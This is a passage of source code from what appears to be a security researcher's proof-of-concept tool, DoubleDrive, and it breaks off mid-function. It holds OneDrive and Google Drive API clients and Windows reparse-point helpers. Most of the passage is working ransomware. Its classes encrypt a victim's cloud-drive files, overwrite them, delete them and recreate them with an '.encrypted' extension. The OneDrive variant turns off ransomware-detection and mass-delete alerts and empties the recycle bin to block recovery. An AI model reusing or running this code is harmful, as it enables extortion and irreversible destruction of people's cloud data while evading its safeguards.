-------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/google_drive/google_drive_item.py: -------------------------------------------------------------------------------- 1 | from dataclasses import dataclass 2 | 3 | from doubledrive.cloud_drive.cloud_drive import CloudDriveItem, CloudDriveFolderItem, CloudDriveFileItem 4 | 5 | @dataclass 6 | class GoogleDriveItem(CloudDriveItem): 7 | id: str 8 | 9 | def __init__(self, full_path: str, id: str, fields: dict) -> None: 10 | super().__init__(full_path) 11 | self.id = id 12 | self.fields = fields 13 | 14 | @dataclass 15 | class GoogleDriveFolderItem(GoogleDriveItem, CloudDriveFolderItem): 16 | def __init__(self, full_path: str, id: str, fields: dict) -> None: 17 | GoogleDriveItem.__init__(self, full_path, id, fields) 18 | 19 | @dataclass 20 | class GoogleDriveFileItem(GoogleDriveItem, CloudDriveFileItem): 21 | def __init__(self, full_path: str, id: str, fields: dict) -> None: 22 | GoogleDriveItem.__init__(self, full_path, id, fields) -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/onedrive/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/cloud_drive/onedrive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/onedrive/onedrive.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | import time 4 | from http import HTTPStatus 5 | 6 | from .onedrive_item import OneDriveItem, OneDriveFileItem, OneDriveFolderItem, OneDrivePackageItem 7 | from doubledrive.cloud_drive.cloud_drive import * 8 | 9 | class OneDrive(ICloudDriveSession): 10 | """ 11 | A session with a OneDrive account 12 | """ 13 | 14 | def __init__(self) -> None: 15 | """ 16 | Creates a OneDrive instance 17 | """ 18 | self.__drive_id = None 19 | self.__http_session = requests.Session() 20 | 21 | def __item_json_to_onedrive_item(self, item_json: dict) -> OneDriveItem: 22 | """ 23 | Converts the JSON structure that is usually returned from OneDrive's servers for 24 | Describing an item in the cloud storage to the specific sub-class of OneDriveItem 25 | that it matches to 26 | 27 | :param item_json: The JSON structure that is returned by OneDrive to describe an 28 | item on its storage 29 | 30 | :return: A OneDriveItem that represents the item described in the JSON structure 31 | """ 32 | parent_path = item_json["parentReference"]["path"].replace("/drive/root:", "") 33 | parent_id = item_json["parentReference"]["id"] 34 | item_name = item_json["name"] 35 | item_id = item_json["id"] 36 | item_path = f"{parent_path}/{item_name}" 37 | 38 | if None != item_json.get("file", None): 39 | onedrive_item = OneDriveFileItem(item_path, parent_id, item_id) 40 | elif None != item_json.get("folder", None): 41 | onedrive_item = OneDriveFolderItem(item_path, parent_id, item_id) 42 | elif None != item_json.get("package", None): 43 | onedrive_item = OneDrivePackageItem(item_path, parent_id, item_id) 44 | else: 45 | raise RuntimeError("OneDrive element type is unfamiliar") 46 | 47 | return onedrive_item 48 | 49 | def __update_token(self, token): 50 | """ 51 | Updates the token that the session of this object uses when it attempts to send API 52 | requests to OneDrive's servers 53 | 54 | :param token: The new token to use 55 | """ 56 | self.__session_token = token 57 | self.__http_session.headers.update({"Authorization": self.__session_token}) 58 | 59 | def __safe_http_request(self, *args, **kwargs) -> requests.Response: 60 | """ 61 | Sends an http request using the self.__http_session object, retries 62 | up to 4 times if temporary exception occur and finally raises an 63 | exception if the status code is an error. 64 | 65 | Note - This method supports all the arguments of the requests.Session.request() method 66 | :return: The requests.Response option returned from the requests module 67 | """ 68 | retries = 4 69 | for i in range(retries): 70 | try: 71 | res = self.__http_session.request(*args, **kwargs) 72 | except requests.exceptions.ChunkedEncodingError or requests.exceptions.Timeout: 73 | continue 74 | 75 | if HTTPStatus.SERVICE_UNAVAILABLE == res.status_code: 76 | time.sleep(0.5) 77 | else: 78 | break 79 | 80 | res.raise_for_status() 81 | return res 82 | 83 | def __upload_file_content(self, onedrive_file_path: str, file_content: bytes, req_data: dict) -> requests.Response: 84 | """ 85 | Uploads a content of a file to the OneDrive cloud storage. 86 | 87 | :param onedrive_file_path: The path of the target file for the upload 88 | :param file_content: The content to upload 89 | :param req_data: A dict of OneDrive's upload settings 90 | by now, the parameter that I identified is meant to 91 | tell OneDrive's server whether to fail when a file with this 92 | path exists or to just modify it. Its name is '"@name.conflictBehavior' 93 | and it can be set to 'replace' or 'fail' 94 | :return: The respond from the server 95 | """ 96 | res = self.__safe_http_request("POST", f"https://api.onedrive.com/v1.0/drives/me/items/root:{onedrive_file_path}:/oneDrive.createUploadSession", json=req_data) 97 | res_json = res.json() 98 | upload_url = res_json["uploadUrl"] 99 | 100 | headers = {"Content-Length": str(len(file_content))} 101 | res = self.__safe_http_request("PUT", upload_url, data=file_content, headers=headers) 102 | 103 | return res 104 | 105 | def __delete_item_by_id(self, item_id): 106 | """ 107 | Deletes an item from the cloud storage. 108 | 109 | :param item_id: The ID of the item to delete 110 | """ 111 | res = self.__safe_http_request("DELETE", f"https://api.onedrive.com/v1.0/drives/me/items/{item_id}") 112 | 113 | def login_using_token(self, token: str): 114 | """ 115 | \"Logins\" into a OneDrive account using an access token for it. 116 | 117 | :param token: The token to login with. Should be given with its prefix. For example: \"Bearer ...\" or \"WLID1.1 t=...\" 118 | """ 119 | self.__update_token(token) 120 | 121 | def get_token(self): 122 | """ 123 | Returns the access token used for the authenticating with OneDrive. 124 | """ 125 | return self.__session_token 126 | 127 | def rename_item(self, onedrive_item: OneDriveItem, new_name: str) -> OneDriveItem: 128 | """ 129 | Renames an item in the cloud storage. 130 | 131 | :param onedrive_item: The OneDrive item to rename 132 | :param new_name: The new name 133 | :return: The new item after it was renamed 134 | """ 135 | params = { 136 | "@name.conflictBehavior":"replace", 137 | "name": new_name, 138 | "select": "*, path" 139 | } 140 | res = self.__safe_http_request("PATCH", f"https://api.onedrive.com/v1.0/drives/me/items/{onedrive_item.id}", json=params) 141 | return self.__item_json_to_onedrive_item(res.json()) 142 | 143 | def cancel_all_onedrive_changes_subscriptions(self): 144 | """ 145 | Cancels all the subscriptions for syncing with the OneDrive account. In other words, 146 | all the OneDrive applications that sync local directories with the OneDrive account will 147 | stop syncing files with the account until they are restarted. 148 | """ 149 | res = self.__safe_http_request("GET", "https://api.onedrive.com/v1.0/drive/root/subscriptions") 150 | for subscription in res.json()["value"]: 151 | subscription_id = subscription["id"] 152 | res = self.__safe_http_request("DELETE", f"https://api.onedrive.com/v1.0/drive/root/subscriptions/{subscription_id}") 153 | 154 | def send_item_to_email(self, onedrive_item: OneDriveItem, email: str): 155 | """ 156 | Shares a OneDrive item with an email. This method can be used for sharing an item with an email 157 | address that does not belong to a Microsoft account. 158 | 159 | :param onedrive_item: The OneDrive item to share. 160 | :param email: The email to share the item with. 161 | """ 162 | headers = { 163 | "AppId": "1276168582", 164 | "ClientAppId": "1276168582", 165 | "Platform": "Android Emulator", 166 | "Version": "6.74", 167 | "User-Agent": "okhttp/4.9.3", 168 | "Accept": "application/json", 169 | "Accept-Encoding": "gzip", 170 | } 171 | 172 | params = { 173 | "entities":[{"email": email, "linkType":0, "role":2, "type":0}], 174 | "id": onedrive_item.id, 175 | "message": "", 176 | "requireSignIn": False, 177 | "userAction":0 178 | } 179 | res = self.__safe_http_request("POST", "https://skyapi.live.net/API/2/SetPermissions", json=params, headers=headers) 180 | 181 | def get_user_preferences(self): 182 | """ 183 | Returns the user's email preferences. 184 | """ 185 | res = self.__safe_http_request("GET", f"https://api.onedrive.com/v1.0/drive/userPreferences/email") 186 | return res.json() 187 | 188 | def patch_user_preferences(self, new_preferences: dict): 189 | """ 190 | Changes the user's email preferences. Supported settings with example values: 191 | { 192 | ActivitiesDigest: true 193 | DocumentDigestEmail: true 194 | MassDelete: true 195 | PhotoStreamAccessGranted: true 196 | PhotoStreamComment: true 197 | PhotoStreamInviteAccepted: true 198 | PhotoStreamNewPost: true 199 | PhotoStreamReaction: true 200 | PremiumPositioning: true 201 | RansomwareDetection: true 202 | WeekendRecap: false 203 | } 204 | 205 | :param new_preferences: A dict of the new preferences 206 | """ 207 | res = self.__safe_http_request("PATCH", f"https://api.onedrive.com/v1.0/drive/userPreferences/email", json=new_preferences) 208 | 209 | def delete_from_recycle_bin(self, onedrive_item_id_list: list[OneDriveItem]): 210 | """ 211 | Delete specific OneDrive items from the recycle bin. 212 | 213 | :param onedrive_item_id_list: A list of the items to delete 214 | """ 215 | headers = { 216 | "AppId": "1276168582", 217 | "ClientAppId": "1276168582", 218 | "Platform": "Android Emulator", 219 | "Version": "6.74", 220 | "User-Agent": "okhttp/4.9.3", 221 | "Accept": "application/json", 222 | "Accept-Encoding": "gzip", 223 | } 224 | 225 | params = { 226 | "cid": self.get_drive_id(), 227 | "deletionType": 3, 228 | "items": onedrive_item_id_list 229 | } 230 | 231 | res = self.__safe_http_request("POST", f"https://skyapi.live.net/API/2/DeleteItems", headers=headers, json=params) 232 | 233 | def empty_recycle_bin(self): 234 | """ 235 | Empties the recycle bin 236 | """ 237 | headers = { 238 | "AppId": "1276168582", 239 | "ClientAppId": "1276168582", 240 | "Platform": "Android Emulator", 241 | "Version": "6.74", 242 | "User-Agent": "okhttp/4.9.3", 243 | "Accept": "application/json", 244 | "Accept-Encoding": "gzip", 245 | } 246 | 247 | res = self.__safe_http_request("POST", f"https://skyapi.live.net/API/2/DeleteAll", headers=headers) 248 | 249 | def get_drive_id(self): 250 | """ 251 | Returns the ID that identifies the drive of the OneDrive cloud storage 252 | """ 253 | if None != self.__drive_id: 254 | return self.__drive_id 255 | 256 | res = self.__safe_http_request("GET", "https://api.onedrive.com/v1.0/drives/me") 257 | self.__drive_id = res.json()["id"] 258 | 259 | return self.__drive_id 260 | 261 | def get_item_by_path(self, item_path: str) -> OneDriveItem: 262 | """ 263 | Returns an item by its path on the cloud storage. 264 | 265 | :param item_path: The item's path 266 | :raises RuntimeError: If the given path was not found 267 | """ 268 | if "/" != item_path: 269 | onedrive_parent_item = self.get_item_by_path(os.path.dirname(item_path)) 270 | path_parent_children = self.list_children(onedrive_parent_item) 271 | path_basename = os.path.basename(item_path) 272 | for child_onedrive_item in path_parent_children: 273 | if path_basename == child_onedrive_item.name: 274 | return child_onedrive_item 275 | raise RuntimeError("Could not find OneDrive item") 276 | else: 277 | return self.get_root_folder_item() 278 | 279 | def read_shared_file_content(self, onedrive_drive_id: str, onedrive_item_id: str, auth_key: str) -> bytes: 280 | """ 281 | Reads the content of a shared file by its ID, the ID of its OneDrive drive and using 282 | an authentication key that was issued specifically for the purpose of the share. 283 | 284 | The parameters of this call can all be extracted from an email that was sent as a result 285 | of sharing a file with OneDrive. 286 | 287 | Note - You do not have to be logged in in order to use this function. 288 | 289 | :param onedrive_drive_id: The ID of the OneDrive drive where that shared file is located 290 | :param onedrive_item_id: The ID of the shared file 291 | :param auth_key: The authentication key that was issued for the purpose of the share 292 | :return: The content of the shared file 293 | """ 294 | req_data = { 295 | "select": "id,@content.downloadUrl", 296 | "authkey": auth_key, 297 | } 298 | 299 | res = self.__safe_http_request("GET", f"https://api.onedrive.com/v1.0/drives/{onedrive_drive_id}/items/{onedrive_item_id}", params=req_data) 300 | res = self.__safe_http_request("GET", res.json()["@content.downloadUrl"]) 301 | return res.content 302 | 303 | def read_file_content(self, onedrive_item: OneDriveFileItem) -> bytes: 304 | """ 305 | Read the content of a file in OneDrive 306 | 307 | :param onedrive_item: The file to read 308 | :return: The content of the file 309 | """ 310 | req_data = {"select": "@content.downloadUrl"} 311 | 312 | res = self.__safe_http_request("GET", f"https://api.onedrive.com/v1.0/drives/me/items/{onedrive_item.id}", json=req_data) 313 | res = self.__safe_http_request("GET", res.json()["@content.downloadUrl"]) 314 | return res.content 315 | 316 | def create_file(self, onedrive_file_path: str, file_content: bytes, modify_if_exists: bool = False) -> OneDriveFileItem: 317 | """ 318 | Creates a file in OneDrive. 319 | 320 | :param onedrive_file_path: The path for the new file. 321 | :param file_content: The content of the new file 322 | :param modify_if_exists: True if this function should modify the path of the given file in case it already exists, defaults to False 323 | :return: The new file 324 | """ 325 | conflict_behavior = "replace" if modify_if_exists else "fail" 326 | req_data = {"item":{"@name.conflictBehavior":conflict_behavior}} 327 | upload_response = self.__upload_file_content(onedrive_file_path, file_content, req_data) 328 | upload_response_json = upload_response.json() 329 | return self.__item_json_to_onedrive_item(upload_response_json) 330 | 331 | def modify_file_content(self, onedrive_item: OneDriveFileItem, new_content: bytes): 332 | """ 333 | Modifies a file content in OneDrive. 334 | 335 | :param onedrive_item: The file to modify 336 | :param new_content: The new content to overwrite the file with 337 | """ 338 | req_data = {"item":{"@name.conflictBehavior":"replace"}} 339 | self.__upload_file_content(onedrive_item.full_path, new_content, req_data) 340 | 341 | def delete_item(self, onedrive_item: OneDriveItem): 342 | """ 343 | Deletes an item in OneDrive. 344 | 345 | :param onedrive_item: The item to delete 346 | """ 347 | self.__delete_item_by_id(onedrive_item.id) 348 | 349 | def get_root_folder_item(self) -> OneDriveFolderItem: 350 | """ 351 | Returns the root folder in OneDrive. 352 | """ 353 | return OneDriveFolderItem("/", None, "root") 354 | 355 | def list_children(self, onedrive_folder: OneDriveFolderItem) -> list[OneDriveItem]: 356 | """ 357 | Lists all the direct children of a folder in OneDrive (only at the first level). 358 | 359 | :param onedrive_folder: The folder to list 360 | :return: A list containing all the children of the given folder 361 | """ 362 | req_params = { 363 | "$top": 100, 364 | "$select": "*,ocr,webDavUrl,sharepointIds,isRestricted,commentSettings,specialFolder" 365 | } 366 | 367 | children_list = [] 368 | next_page_request_url = f"https://api.onedrive.com/v1.0/drives/me/items/{onedrive_folder.id}/children" 369 | while next_page_request_url: 370 | res = self.__safe_http_request("GET", next_page_request_url, json=req_params) 371 | res_json = res.json() 372 | res_children_list = res_json["value"] 373 | next_page_request_url = res_json.get("@odata.nextLink", None) 374 | 375 | for child_element in res_children_list: 376 | onedrive_item = self.__item_json_to_onedrive_item(child_element) 377 | children_list.append(onedrive_item) 378 | 379 | return children_list 380 | 381 | 382 | def list_children_recursively(self, onedrive_folder_item: OneDriveFolderItem) -> list[OneDriveItem]: 383 | """ 384 | Lists all the children of a folder in OneDrive recursively (at all levels) 385 | 386 | :param onedrive_folder_item: The folder to list 387 | :return: A list of all the folder's children 388 | """ 389 | all_children_items = [] 390 | first_level_children = self.list_children(onedrive_folder_item) 391 | 392 | all_children_items.extend(first_level_children) 393 | for onedrive_child_item in first_level_children: 394 | if isinstance(onedrive_child_item, OneDriveFolderItem): 395 | all_children_items.extend(self.list_children_recursively(onedrive_child_item)) 396 | 397 | return all_children_items 398 | 399 | -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/onedrive/onedrive_item.py: -------------------------------------------------------------------------------- 1 | from dataclasses import dataclass 2 | 3 | from doubledrive.cloud_drive.cloud_drive import CloudDriveItem, CloudDriveFolderItem, CloudDriveFileItem 4 | 5 | @dataclass 6 | class OneDriveItem(CloudDriveItem): 7 | """ 8 | A general item that is stored on OneDrive storage 9 | """ 10 | id: str 11 | 12 | def __init__(self, full_path: str, parent_id: str, id: str) -> None: 13 | super().__init__(full_path) 14 | self.id = id 15 | self.parent_id = parent_id 16 | 17 | @dataclass 18 | class OneDriveFolderItem(OneDriveItem, CloudDriveFolderItem): 19 | """ 20 | A folder that is stored on OneDrive storage 21 | """ 22 | def __init__(self, full_path: str, parent_id: str, id: str) -> None: 23 | OneDriveItem.__init__(self, full_path, parent_id, id) 24 | 25 | @dataclass 26 | class OneDriveFileItem(OneDriveItem, CloudDriveFileItem): 27 | """ 28 | A file that is stored on OneDrive storage 29 | """ 30 | def __init__(self, full_path: str, parent_id: str, id: str) -> None: 31 | OneDriveItem.__init__(self, full_path, parent_id, id) 32 | 33 | @dataclass 34 | class OneDrivePackageItem(OneDriveItem, CloudDriveFileItem): 35 | """ 36 | A 'package' file that is stored on OneDrive storage. That is a file that 37 | OneDrive has a more advanced support for on the web OneDrive version. 38 | Files such as Word documents, PowerPoint slides, OneNote documents, etc.. 39 | """ 40 | def __init__(self, full_path: str, parent_id: str, id: str) -> None: 41 | OneDriveItem.__init__(self, full_path, parent_id, id) 42 | -------------------------------------------------------------------------------- /src/doubledrive/cloud_ransomware/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/cloud_ransomware/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/cloud_ransomware/cloud_drive_ransomware.py: -------------------------------------------------------------------------------- 1 | import os 2 | import uuid 3 | from cryptography.fernet import Fernet 4 | 5 | from doubledrive.cloud_drive.cloud_drive import * 6 | 7 | class CloudDriveRansomware: 8 | """ 9 | A base class for classes that implement a ransomware for a cloud storage service 10 | """ 11 | 12 | def __init__(self, logged_in_cloud_drive: ICloudDriveSession, save_key_path: str): 13 | """ 14 | Creates a CloudDriveRansomware 15 | 16 | :param logged_in_cloud_drive: An instance of a session with a cloud storage service that is already logged in 17 | :param save_key_path: Path to save the Fernet encryption/decryption key 18 | """ 19 | self._cloud_drive = logged_in_cloud_drive 20 | self.__save_key_path = save_key_path 21 | self.__key = None 22 | 23 | @abstractmethod 24 | def _first_stage_overwriting_finished_callback(self, paths_to_encrypted_contents: dict[str, bytes]): 25 | """ 26 | Callback for when the first stage of overwriting target files with their encrypted contents is done. 27 | Does not happen if quick_delete mode was set. 28 | 29 | :param paths_to_encrypted_contents: A dict that maps paths that were encrypted to their encrypted contents 30 | """ 31 | pass 32 | 33 | @abstractmethod 34 | def _second_stage_deletion_finished_callback(self, paths_to_encrypted_contents: dict[str, bytes]): 35 | """ 36 | Callback for when the second stage of deleting all target files is done. 37 | 38 | :param paths_to_encrypted_contents: A dict that maps paths that were encrypted to their encrypted contents 39 | """ 40 | pass 41 | 42 | @abstractmethod 43 | def _third_stage_recreation_finished_callback(self, paths_to_encrypted_contents: dict[str, bytes]): 44 | """ 45 | Callback for when the third stage of restoring all encrypted files to their original location is done. 46 | 47 | :param paths_to_encrypted_contents: A dict that maps paths that were encrypted to their encrypted contents 48 | """ 49 | pass 50 | 51 | def start_ransomware(self, target_cloud_file_items: list[CloudDriveFileItem], quick_delete: bool = False, file_extension: str = ".encrypted"): 52 | """ 53 | Starts the ransomware action. This ransomware implementation works in three stages: 54 | * Encrypt all target files (can be skipped with quick_delete mode) 55 | * Delete all target files 56 | * Restore all target file 57 | 58 | The deletion step is very likely to be needed when a cloud ransomware is run because many different cloud services has recovery 59 | features for files. Most services will have at least previous versions of Microsoft Office files. Thus, the best way to deal with 60 | that is to delete these files and restore them back to their original paths with the new encrypted contents. 61 | 62 | The first stage of encrypting and overwriting the files can be skipped. However, this stage ensures that the files are overwritten 63 | on the disk itself and cannot later be restored from an MFT entries marked as free. The attacker can also ensure that with another 64 | way which is creating a huge file on the disk and fill the disk completely and by that ensuring that all free space on the disk is 65 | overwritten and there is nothing to restore. 66 | 67 | Note - Every time this function run it generates a new Fernet symmetric encryption/decryption key to encrypt files with. The Fernet 68 | symmetric encryption is used just for PoC and convinience purposes. You are welcome to modify the code to change any other encryption 69 | method you prefer. 70 | 71 | :param target_cloud_file_items: A list of the target files to encrypt 72 | :param quick_delete: Whether the first stage of encrypting and overwriting the files should be skipped the file, defaults to False 73 | :param file_extension: ransomware file extension to add to the encrypted files, defaults to ".encrypted" 74 | """ 75 | self.__generate_key() 76 | self.__save_key() 77 | paths_to_encrypted_contents = self.__create_encrypted_contents_from_cloud_files(target_cloud_file_items) 78 | 79 | if not quick_delete: 80 | for cloud_file_path, file_encrypted_content in paths_to_encrypted_contents.items(): 81 | cloud_drive_item = self._cloud_drive.get_item_by_path(cloud_file_path) 82 | print(f"Modifying file: {cloud_file_path}") 83 | self._cloud_drive.modify_file_content(cloud_drive_item, file_encrypted_content) 84 | self._first_stage_overwriting_finished_callback(paths_to_encrypted_contents) 85 | 86 | for cloud_file in target_cloud_file_items: 87 | print(f"Deleting file: {cloud_file.full_path}") 88 | self._cloud_drive.delete_item(cloud_file) 89 | self._second_stage_deletion_finished_callback(paths_to_encrypted_contents) 90 | 91 | for cloud_file_path, new_file_content in paths_to_encrypted_contents.items(): 92 | print(f"Creating file with encrypted contents: {cloud_file_path}{file_extension}") 93 | self._cloud_drive.create_file(f"{cloud_file_path}{file_extension}", new_file_content) 94 | self._third_stage_recreation_finished_callback(paths_to_encrypted_contents) 95 | 96 | 97 | def __save_key(self): 98 | """ 99 | Saves the Fernet encryption/decryption key to the path given in the constructor. 100 | """ 101 | with open(self.__save_key_path, "wb") as f: 102 | f.write(self.__key) 103 | 104 | def __generate_key(self): 105 | """ 106 | Generates the Fernet symmetric encryption key 107 | """ 108 | self.__key = Fernet.generate_key() 109 | 110 | def __encrypt_data(self, file_content: bytes) -> bytes: 111 | """ 112 | Encrypts a bytes buffer using the previously generated Fernet symmetric key 113 | 114 | :param file_content: data to encrypt 115 | :return: The encrypted data 116 | """ 117 | return Fernet(self.__key).encrypt(file_content) 118 | 119 | def __create_encrypted_contents_from_cloud_files(self, target_cloud_file_items: list[CloudDriveFileItem]) -> dict[str, bytes]: 120 | """ 121 | Creates a dictionary mapping of paths of files to encrypt on the cloud storage to their new encrypted contents. 122 | 123 | :param target_cloud_file_items: A list of the files to encrypt. 124 | :return: The created mapping dictionary 125 | """ 126 | paths_to_encrypted_contents = {} 127 | for cloud_file_item in target_cloud_file_items: 128 | print(f"Generating encrypted contents for file: {cloud_file_item.full_path}") 129 | file_content = self._cloud_drive.read_file_content(cloud_file_item) 130 | file_new_content = self.__encrypt_data(file_content) 131 | paths_to_encrypted_contents[cloud_file_item.full_path] = file_new_content 132 | 133 | return paths_to_encrypted_contents -------------------------------------------------------------------------------- /src/doubledrive/cloud_ransomware/google_drive_ransomware.py: -------------------------------------------------------------------------------- 1 | import time 2 | 3 | from doubledrive.cloud_drive.google_drive.google_drive import GoogleDrive 4 | from doubledrive.cloud_ransomware.cloud_drive_ransomware import CloudDriveRansomware 5 | 6 | class GoogleDriveRansomware(CloudDriveRansomware): 7 | 8 | def __init__(self, logged_in_cloud_drive: GoogleDrive, save_key_dir_path: str,): 9 | super().__init__(logged_in_cloud_drive, save_key_dir_path) 10 | 11 | def _first_stage_overwriting_finished_callback(self, paths_to_encrypted_contents): 12 | pass 13 | 14 | def _second_stage_deletion_finished_callback(self, paths_to_encrypted_contents): 15 | # No need to empty the trash bin because the delete_item function in GoogleDrive deletes files permanently 16 | pass 17 | 18 | def _third_stage_recreation_finished_callback(self, paths_to_encrypted_contents): 19 | pass -------------------------------------------------------------------------------- /src/doubledrive/cloud_ransomware/onedrive_ransomware.py: -------------------------------------------------------------------------------- 1 | import time 2 | 3 | from doubledrive.cloud_drive.onedrive.onedrive import OneDrive 4 | from doubledrive.cloud_ransomware.cloud_drive_ransomware import CloudDriveRansomware 5 | 6 | class OneDriveRansomware(CloudDriveRansomware): 7 | 8 | def __init__(self, logged_in_cloud_drive: OneDrive, save_key_path: str, first_stage_done_delay = 10, second_stage_done_delay = 10): 9 | super().__init__(logged_in_cloud_drive, save_key_path) 10 | self.__first_stage_done_delay = first_stage_done_delay 11 | self.__second_stage_done_delay = second_stage_done_delay 12 | self._cloud_drive.patch_user_preferences({"RansomwareDetection": False, "MassDelete": False}) 13 | 14 | def _first_stage_overwriting_finished_callback(self, paths_to_encrypted_contents): 15 | time.sleep(self.__first_stage_done_delay) 16 | 17 | def _second_stage_deletion_finished_callback(self, paths_to_encrypted_contents): 18 | time.sleep(self.__second_stage_done_delay) 19 | self._cloud_drive.empty_recycle_bin() 20 | 21 | def _third_stage_recreation_finished_callback(self, paths_to_encrypted_contents): 22 | pass -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/endpoint_takeover_utils/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/endpoint_info/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/endpoint_takeover_utils/endpoint_info/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/endpoint_info/onedrive/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/endpoint_takeover_utils/endpoint_info/onedrive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/endpoint_info/onedrive/onedrive_info.py: -------------------------------------------------------------------------------- 1 | import winreg 2 | import os 3 | 4 | class OneDriveInfo: 5 | ONEDRIVE_PER_USER_FOLDER = os.path.expandvars(r"%localappdata%\Microsoft\OneDrive") 6 | PERSONAL_ODL_FOLDER = os.path.join(ONEDRIVE_PER_USER_FOLDER, "logs\\Personal") 7 | 8 | def __init__(self) -> None: 9 | hkcu_key = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) 10 | 11 | with winreg.OpenKey(hkcu_key, "Software\\Microsoft\\OneDrive\\Accounts\\Personal") as onedrive_personal_reg_key: 12 | self.sync_folder = winreg.QueryValueEx(onedrive_personal_reg_key, "UserFolder")[0] 13 | 14 | with winreg.OpenKey(hkcu_key, "Software\\Microsoft\\OneDrive") as onedrive_reg_key: 15 | self.main_exe_path = winreg.QueryValueEx(onedrive_reg_key, "OneDriveTrigger")[0] 16 | onedrive_version = winreg.QueryValueEx(onedrive_reg_key, "Version")[0] 17 | 18 | self.program_folder = os.path.dirname(self.main_exe_path) 19 | self.version_installation_folder = os.path.join(self.program_folder, onedrive_version) 20 | 21 | 22 | g_onedrive_info_single_instance = None 23 | def get_onedrive_info(): 24 | global g_onedrive_info_single_instance 25 | if None == g_onedrive_info_single_instance: 26 | g_onedrive_info_single_instance = OneDriveInfo() 27 | return g_onedrive_info_single_instance -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/reparse_points/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/endpoint_takeover_utils/reparse_points/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/reparse_points/reparse_points.py: -------------------------------------------------------------------------------- 1 | import win32file 2 | import winioctlcon 3 | import ctypes 4 | from .reparse_structs import * 5 | import pywintypes 6 | 7 | IO_REPARSE_TAG_SYMLINK = 0xA000000C 8 | IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003 9 | REPARSE_DATA_BUFFER_HEADER_LENGTH = getattr(REPARSE_DATA_BUFFER, "GenericReparseBuffer").offset 10 | 11 | 12 | def nt_path(path: str): 13 | if path.startswith("\\??"): 14 | return path 15 | 16 | return f"\\??\\{path}" 17 | 18 | 19 | def create_symlink_reparse_buffer(target_path: str, print_name: str, relative: bool): 20 | if not relative: target_path = nt_path(target_path) 21 | unicode_target_path = ctypes.create_unicode_buffer(target_path) 22 | unicode_target_path_byte_size = (len(unicode_target_path) - 1) * 2 # remove null terminator from size 23 | unicode_print_name = ctypes.create_unicode_buffer(print_name) 24 | unicode_print_name_byte_size = (len(unicode_print_name) - 1) * 2 # remove null terminator from size 25 | 26 | path_buffer_byte_size = unicode_target_path_byte_size + unicode_print_name_byte_size + 12 + 4 27 | total_size = path_buffer_byte_size + REPARSE_DATA_BUFFER_HEADER_LENGTH; 28 | 29 | reparse_data_buffer = ctypes.create_string_buffer(b"\x00" * (total_size-1)) 30 | reparse_data_struct = ctypes.cast(reparse_data_buffer, ctypes.POINTER(REPARSE_DATA_BUFFER)).contents 31 | reparse_data_struct.ReparseTag = IO_REPARSE_TAG_SYMLINK 32 | reparse_data_struct.ReparseDataLength = path_buffer_byte_size 33 | 34 | reparse_data_struct.SymbolicLinkReparseBuffer.SubstituteNameOffset = 0 35 | reparse_data_struct.SymbolicLinkReparseBuffer.SubstituteNameLength = unicode_target_path_byte_size 36 | 37 | path_buffer_address = ctypes.addressof(reparse_data_struct) + REPARSE_DATA_BUFFER_HEADER_LENGTH + getattr(SYMBOLIC_LINK_REPARSE_BUFFER, "PathBuffer").offset 38 | path_buffer_pointer = ctypes.cast(path_buffer_address, ctypes.POINTER(ctypes.c_byte)) 39 | ctypes.memmove(path_buffer_pointer, unicode_target_path, unicode_target_path_byte_size + 2) 40 | 41 | reparse_data_struct.SymbolicLinkReparseBuffer.PrintNameOffset = unicode_target_path_byte_size + 2 42 | reparse_data_struct.SymbolicLinkReparseBuffer.PrintNameLength = unicode_print_name_byte_size 43 | 44 | print_name_address = ctypes.addressof(reparse_data_struct) + REPARSE_DATA_BUFFER_HEADER_LENGTH + getattr(SYMBOLIC_LINK_REPARSE_BUFFER, "PathBuffer").offset + unicode_target_path_byte_size + 2 45 | print_name_pointer = ctypes.cast(print_name_address, ctypes.POINTER(ctypes.c_byte)) 46 | ctypes.memmove(print_name_pointer, unicode_print_name, unicode_print_name_byte_size + 2) 47 | reparse_data_struct.SymbolicLinkReparseBuffer.Flags = 1 if relative else 0 48 | 49 | return bytes(reparse_data_buffer) 50 | 51 | 52 | def create_mount_point_reparse_buffer(target_path: str, print_name: str, relative: bool): 53 | if not relative: target_path = nt_path(target_path) 54 | unicode_target_path = ctypes.create_unicode_buffer(target_path) 55 | unicode_target_path_byte_size = (len(unicode_target_path) - 1) * 2 # remove null terminator from size 56 | unicode_print_name = ctypes.create_unicode_buffer(print_name) 57 | unicode_print_name_byte_size = (len(unicode_print_name) - 1) * 2 # remove null terminator from size 58 | 59 | path_buffer_byte_size = unicode_target_path_byte_size + unicode_print_name_byte_size + 8 + 4 60 | total_size = path_buffer_byte_size + 